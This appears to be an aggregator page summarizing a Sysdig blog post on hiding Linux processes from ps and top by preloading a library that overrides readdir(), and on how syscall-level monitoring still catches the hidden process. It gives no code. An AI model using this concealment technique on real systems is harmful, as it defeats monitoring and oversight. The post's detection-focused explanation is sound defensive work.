Home / Companies / Sysdig / Blog / Post Details
Content Deep Dive

Hiding Linux processes for fun + profit

Blog post from Sysdig

Post Details
Company
Date Published
Author
Gianluca Borello
Word Count
2,917
Company Posts That Month
5
Language
English
Hacker News Points
-
Summary

Gianluca Borello explores the concept of hiding processes in Linux from monitoring tools like `ps` and `top`. By leveraging the dynamic linker's preloading feature, Borello demonstrates how to create a custom shared library that overrides the `readdir()` function in libc, effectively concealing a malicious script from standard process monitoring. The post discusses various methods to achieve process hiding, including modifying binaries and kernel system calls, but settles on the preloading technique for its simplicity and effectiveness. Despite successfully hiding the process from traditional tools, Borello shows that Sysdig, a system call-based monitoring tool, remains capable of detecting the hidden process due to its ability to inspect system calls directly. The experiment highlights the versatility of Linux's /proc file system and the challenges of completely concealing system activity, emphasizing the importance of monitoring both through system calls and file system data.

Trends Found in this Post

No tracked trend matches for this post yet.